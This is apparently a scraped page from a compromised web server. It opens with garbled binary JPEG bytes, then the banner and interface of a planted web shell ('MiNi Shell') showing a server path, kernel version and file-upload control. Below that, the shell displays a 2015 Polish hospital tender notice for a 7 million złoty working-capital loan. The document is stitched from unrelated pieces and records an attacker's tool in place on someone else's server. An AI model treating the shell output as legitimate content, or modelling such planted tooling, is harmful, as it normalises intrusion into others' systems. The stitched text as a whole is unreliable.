JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/141054-N-2015.html

<p class="kh_header"><b>Poznań: Usługa udzielenia kredytu obrotowego, krótkoterminowego, w wysokości 7 000 000,00 zł  (słownie: siedem milionów złotych) na okres jednego roku</b><br>
<b>Numer ogłoszenia: 141054 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa udzielenia kredytu obrotowego, krótkoterminowego, w wysokości 7 000 000,00 zł  (słownie: siedem milionów złotych) na okres jednego roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    Przedmiot  zamówienia:
Usługa udzielenia kredytu obrotowego, krótkoterminowego, w wysokości 7 000 000,00 zł  (słownie: siedem milionów złotych) na okres jednego roku.
2.	Warunki realizacji zamówienia:
2.1	Wykonawca udzieli Zamawiającemu kredytu krótkoterminowego w kwocie 7.000.000,00 zł (słownie: siedem milionów  złotych).
2.2	Zamawiający przeznaczy środki z kredytu na bieżąca działalność .
2.3	Kredyt udzielony będzie na okres 12 miesięcy od dnia wypłaty środków z kredytu.
2.4	Wykonawca otworzy rachunek bieżący (z dostępem do bankowości elektronicznej) najpóźniej w dniu zawarcia umowy kredytowej i prowadzić go będzie nieodpłatnie w okresie jej obowiązywania.
2.5	Wykonawca otworzy subkonto do rachunku kredytowego najpóźniej w dniu zawarcia umowy i prowadzić je będzie nieodpłatnie w trakcie realizacji  umowy kredytowej.
2.6	Wykonawca postawi do dyspozycji Zamawiającego środki kredytu w ciągu dwóch dni od dnia ustanowienia prawnego zabezpieczenia  - weksel i deklaracja wekslowa.
2.7	Od kwoty udzielonego kredytu Wykonawca pobierze wyłącznie prowizję przygotowawczą w wysokości nie większej niż  1,0  % wartości kredytu.
2.8	Wykonawca dokona uruchomienia kredytu jednorazowo zgodnie z dyspozycją Zamawiającego. 
2.9	Wykorzystanie kredytu następować będzie w walucie polskiej.
2.10	Odsetki płatne wg Stopy Zmiennej, składającej się ze stopy bazowej i marży Wykonawcy, tj. stopy bazowej WIBOR 1 M oraz stałej marży Wykonawcy ustalonej na podstawie złożonej oferty.
2.11	Naliczanie odsetek od dziennych sald zadłużenia w walucie kredytu od daty wypłaty kredytu (włącznie) do daty poprzedzającej pełną spłatę. Odsetki płatne ostatniego dnia okresu odsetkowego. W przypadku, gdy dzień płatności odsetek nie jest dniem roboczym, odsetki są płatne w pierwszym następującym po nim dniu roboczym, a w przypadku ostatniego okresu odsetkowego - w ostatnim poprzedzającym go dniu roboczym. 
2.12	Okresy odsetkowe są jednomiesięczne. Pierwszy okres odsetkowy trwa od dnia pierwszego wykorzystania kredytu do ostatniego dnia danego miesiąca kalendarzowego (włącznie z tymi dniami). Kolejne okresy odsetkowe trwają od pierwszego do ostatniego dnia każdego miesiąca kalendarzowego (włącznie z tymi dniami). Ostatni okres odsetkowy trwa do dnia poprzedzającego dzień ostatecznej spłaty (włącznie). Odsetki naliczane będą od kwoty aktualnego zadłużenia.
2.13	Wysokość stopy zmiennej ustala się według notowań stopy bazowej na 2 dni robocze przed początkiem każdego okresu odsetkowego. Zmiana wysokości stopy bazowej nie stanowi zmiany umowy. W przypadku, gdy nie jest możliwe ustalenie określonej w umowie stopy bazowej dla danego okresu odsetkowego, Wykonawca i Zamawiający uzgodnią inną odpowiednią stopę bazową. W przypadku, gdy w terminie 3 dni roboczych od dnia otrzymania przez Zamawiającego zawiadomienia Wykonawcy o niemożności ustalenia stopy bazowej określonej w umowie, nie zostanie uzgodniona inna stopa bazowa, Wykonawca samodzielnie ustali stopę bazową na podstawie kwotowań czterech banków wiodących na rynku krajowym.
2.14	Wszelkie odsetki będą obliczane w oparciu o rzeczywistą liczbę dni, które upłynęły w okresie odsetkowym, zaś rok będzie liczony jako składający się z 365 dni. Powyższe zasady stosuje się również do dodatkowych obciążeń z tytułu opóźnienia, prowizji oraz innych opłat.
2.15	Spłata kredytu nastąpi jednorazowo w ostatnim dniu obowiązywania umowy. 
2.16	W przypadku, gdy termin spłaty przez Zamawiającego przypada na dzień, który nie jest dniem roboczym, wierzytelność Wykonawcy  spłacona będzie w pierwszym następującym po nim dniu roboczym.
2.17	Zamawiający wymaga aby możliwa była wcześniejsza częściowa lub całkowita spłata kredytu bez ponoszenia dodatkowych kosztów.
2.18	Zamawiający upoważnia Wykonawcę w okresie kredytowania do obciążania jego rachunków bankowych prowadzonych przez Wykonawcę kwotami wszelkich Wierzytelności Wykonawcy powstałych w związku z udzielonym Kredytem w terminach wynikających z Umowy, bez odrębnej dyspozycji.
2.19	Zabezpieczenie spłaty kredytu:
a.   oświadczenie o poddaniu się egzekucji na podstawie bankowego tytułu egzekucyjnego
b.   weksel i deklaracja wekslowa.
2.20	Zamawiający wymaga, aby Wykonawca do oferty dołączył Projekt Umowy Kredytowej oraz wszelkie Regulaminy (o ile je posiada) w sprawie przedmiotowej usługi, obowiązujące  u Wykonawcy, celem sprawdzenia ich zgodności z projektem umowy (zgodnie z art. 384 ust. 1 kodeksu cywilnego).
2.21	W przypadku gdy zapisy Projektu Umowy Kredytowej pozostają w sprzeczności z Regulaminami Wykonawcy, Wykonawca zobowiązany jest dołączyć do oferty oświadczenie, którego treść stanowi, iż zapisy Regulaminów  pozostające w sprzeczności z zapisami  umowy  kredytowej nie będą obowiązywać w stosunku do Zamawiającego.

3.	Zamawiający celem wstępnego zbadania zdolności kredytowej udostępnia  następujące dokumenty:
	3.1	dokumenty finansowe: Opinia Biegłego 2014, Raport Biegłego 2014, Bilans Rachunek Zysków i Strat 2013, Informacja dodatkowa 2013, Opina biegłego 2013, Rachunek przepływów 2013, Raport biegłego 2013,  Bilans Rachunek Zysków i Strat I kw. 2015, Informacje uzupełniające I kwartał 2015, Struktura należności 2014, Struktura należności I kwartał 2015, Struktura wiekowa zobowiązań I kwartał 2015, struktura zobowiązań 31.12.2014r.
	3.2	zaświadczenia z ZUS i Urzędu Skarbowego, Zgoda Senatu, opina Rady Społecznej, Regon Szpital, Regon Przychodnie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże się posiadaniem zezwolenia na prowadzenie działalności bankowej na terenie RP w zakresie objętym przedmiotem zamówienia zgodnie z przepisami ustawy  z dnia 29 sierpnia 1997 r. Prawo bankowe ( tj. Dz. U. z 2015r. poz.128), a w przypadku określonym  w  art. 178 ust. 1 ustawy Prawo bankowe inny dokument potwierdzający uprawnienia do prowadzenia działalności bankowej na terenie RP w zakresie objętym przedmiotem zamówienia - zgodnie z tym przepisem</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta wspólna 

W przypadku składania oferty przez dwa lub więcej podmiotów (Wykonawców ubiegających się wspólnie o udzielenie zamówienia, np. konsorcja) oferta spełniać musi następujące wymagania:
1.	W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy. Warunki udziału, o których mowa w art. 22 ust. 1 pkt. 2 - 4 spełnia co najmniej jeden z nich w wymaganym zakresie.
2.  Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
3.  Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  (do oferty dołączyć odpowiednie pełnomocnictwo). 
4.  Pełnomocnictwo może być udzielone w szczególności:
	-  łącznie przez wszystkich Wykonawców (jeden dokument)
	- oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców)
5.  Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. 
6. Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę  regulującą współpracę tych podmiotów zawierającą następujące postanowienia:
a.	określenie celu  gospodarczego,
b.	określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c.	oznaczenie czasu trwania obejmującego okres realizacji przedmiotu zamówienia,
d.	zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej lub umowy zawartej pod warunkiem zawieszającym.


Podwykonawcy 

1. Definicja umowy o podwykonawstwo zgodnie z art. 2  pkt. 9a ustawy - Prawo zamówień publicznych
Umowa o podwykonawstwo - umowa w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi, dostawy lub roboty budowlane stanowiące część zamówienia publicznego, zawarta między wybranym przez  zamawiającego wykonawcą  a innym podmiotem (podwykonawcą), a w przypadku zamówień publicznych na roboty budowlane także między podwykonawcą a dalszym podwykonawcą lub między dalszymi podwykonawcami.

2.  Zamawiający  ze względu na specyfikę przedmiotu zamówienia nie dopuszcza udziału podwykonawców.


OPIS SPOSOBU PRZYGOTOWANIA OFERT

1.	Wymagania  ogólne
1.1	Wykonawca  może  złożyć tylko  jedną  kompletną  ofertę.
1.2	Oferta  musi  być  złożona  w  formie  pisemnej,  zgodnie  z  wymaganiami  opisanymi  w   niniejszej  specyfikacji.
1.3	Oferta winna  być  sporządzona  w  języku  polskim,  na  maszynie  do  pisania,  komputerze lub  inną  trwałą,  czytelną techniką.  Złożone  materiały  powinny  być  spięte,  wszystkie  strony  oferty  zawierające  jakąkolwiek  treść  winny  być  ponumerowane, podpisane  przez  upoważnionego  przedstawiciela  Wykonawcy  i  opatrzone  pieczątką.  
Strony puste nie wymagają  numeracji,  podpisów  i  pieczątek.  Ewentualne  poprawki  w  tekście oferty  muszą  być  naniesione  w  czytelny  sposób,  parafowane  i  datowane  własnoręcznie  przez  osobę  podpisującą  ofertę.
1.4	Dokumenty sporządzone w języku obcym należy złożyć  wraz  z  tłumaczeniem  na  język  polski.

2.	Zawartość  oferty  i  sposób  jej  przedstawienia
2.1	Ofertę stanowi wypełniony formularz Formularz oferty, Załącznik Nr 1 do  specyfikacji oraz niżej wymienione dokumenty:
a.	Formularz specyfikacji cenowej:  Załącznik Nr  2 do specyfikacji.
2.2	Wraz z ofertą  należy złożyć:
a.	Oświadczenia i dokumenty  wskazane   w  rozdziale VI  specyfikacji.
b.	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c.	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik  może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
2.3	Oferta wraz z załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.

3.	Opakowanie  oferty
3.1	Wykonawca  umieszcza  ofertę  w  nieprzejrzystym,  zamkniętym  opakowaniu,  które:
a.  będzie  zaadresowane  na  Zamawiającego,
b. będzie posiadać oznaczenia: Oferta na usługę udzielenia kredytu obrotowego w wysokości 7 000 000,00 zł . Otwiera Komisja przetargowa dnia: 22.06.2015r. o godz. 09:30.
3.2	W przypadku załączenia do oferty dokumentów, których Zamawiający nie żąda zalecane jest ich oddzielenie od oferty i oznaczenie napisem DOKUMENTY UZUPEŁNIAJĄCE. 

OPIS SPOSOBU OBLICZENIA CENY

1.	Wykonawca określa cenę realizacji zamówienia w Formularzu oferty - Załączniku Nr 2 do specyfikacji. Cena oferty wynika  z danych zawartych w Formularzu  specyfikacji cenowej - Załączniku Nr 1 do specyfikacji.
2.	Cena ofertowa to cena w rozumieniu art. 3 ust. 1 pkt. 1 i ust. 2 ustawy z dnia 9 maja 2014r. o informowaniu o cenach towarów i usług (Dz. U. z 2014r. poz. 915).
3.	Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w  złotych  polskich (PLN).
4.	Ceny muszą być podane i wyliczone  w zaokrągleniu do dwóch miejsc po przecinku (zasady zaokrąglania- końcówki poniżej 0,5 grosza pomija się a końcówki 0.5 grosza i wyższe zaokrągla się do 1 grosza).
5.	Cena podana przez Wykonawcę  winna obejmować wszystkie koszty i składniki związane z wykonaniem zamówienia  oraz warunkami stawianymi przez Zamawiającego.
6.	Cena podana przez Wykonawcę obliczona będzie wg niżej podanych zasad:
a.	cena oferty będzie sumą kosztów za udzielenie kredytu za cały okres realizacji zamówienia,
b.	wysokość marży od kredytu określona przez Wykonawcę zostanie ustalona przez Wykonawcę w formularzu oferty oraz w formularzu specyfikacji cenowej na okres ważności umowy i nie będzie podlegała zmianom,
c.	do wyliczenia kosztu obsługi kredytu Wykonawca  przyjmuje następujące założenia:
-  Wykonawca udzieli kredyt obrotowy w  wysokości 7 000 000.00 zł
-  dla Zamawiającego kosztem kredytu będzie prowizja, oprocentowanie kredytu oparte na zmiennej stawce WIBOR 1M  zgodnie z  formularzem specyfikacji cenowej - Załącznikiem Nr 2 do specyfikacji
-  w celu porównania złożonych ofert należy przyjąć stopę bazową WIBOR 1M z dnia 02 czerwca 2015r. 
tj. 1,65 %, uruchomienie kredytu w pełnej wysokości  do dnia  03 lipca 2015r, oraz spłatę kapitału w kwotach i terminach podanych w formularzu specyfikacji cenowej -  Załączniku Nr 2 do specyfikacji.


Kryteria oceny ofert
1.1	Przy wyborze i ocenie ofert złożonych w postępowaniu Zamawiający będzie kierował się następującymi kryteriami i ich znaczeniem:
KRYTERIUM I:  Cena - 98%
Wartość punktowa kryterium Cena wyliczona zostanie wg wzoru:

		               
 Ilość punktów  =       Cena oferty z najniższą ceną  /   Cena oferty badanej  x  100  x  98%
 
			      
KRYTERIUM II:  Wysokość jednorazowej prowizji przygotowawczej- 2%
Wartość punktowa kryterium Wysokość jednorazowej prowizji przygotowawczej wyliczona zostanie wg wzoru:

Ilość punktów  = 
	                       Najniższa wysokość jednorazowej prowizji przygotowawczej 
                                wśród zaproponowanych przez Wykonawców  /   Wysokość jednorazowej prowizji przygotowawczej z oferty badanej
  x  100  x  2%
	                                 

Wykonawca zobowiązany jest zaoferować jednorazową prowizję przygotowawczą w PLN, a jej wysokość  nie może być większa niż 1,0% wartości kredytu. 
Za najkorzystniejszą zostanie uznana oferta, która uzyska w sumie największą ilość punktów.
Wyliczenie punktów zostanie dokonane z dokładnością do dwóch miejsc po przecinku.
1.2	W oparciu o powyższe kryteria zostanie sporządzony ranking złożonych ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wymaganiom przedstawionym w ustawie - Prawo zamówień publicznych oraz specyfikacji  i uzyska największą ilość punktów.
1.3	W  przypadku, jeżeli  nie  można  dokonać  wyboru  oferty  najkorzystniejszej  z  uwagi  na  to,  że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.
1.4	Jeżeli  zostanie  złożona  oferta,  której  wybór  prowadzić  będzie  do  powstania  obowiązku  podatkowego  Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz-wspólnotowego  nabycia  towarów,  Zamawiający  w  celu  oceny  takiej  oferty  doliczy  do  przedstawionej  w  niej  ceny  podatek  od  towarów  i  usług,  który  będzie  miał  obowiązek  wpłacić  zgodnie  z  obowiązującymi  przepisami.
1.5	W  przypadku  złożenia  oferty  przez  Wykonawcę  mającego  swoją  siedzibę  w  kraju  spoza  obszaru  Unii  Europejskiej  Zamawiający  w  celu  oceny  takiej  oferty  doliczy  do  przedstawionej  w  niej  ceny  różnicę  w kwocie  należnego podatku VAT  oraz  pozostałych  należności,  których  obowiązek  uiszczenia  spoczywa na  Zamawiającym,  wynikających  z  innych  przepisów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Wysokość jednorazowej prowizji przygotowawczej - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzp.gpsk.ump.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GPSK UM w Poznaniu, ul. Polna 33 - Budynek E, pokój nr 104 lub pod adresem poczty elektronicznej  gczekalska@gpsk.am.poznan.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2015 godzina 09:00, miejsce: Siedziba Zamawiającego w Poznaniu, ul. Polna 33  - Kancelaria Ogolna,  Budynek D, pokój nr 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





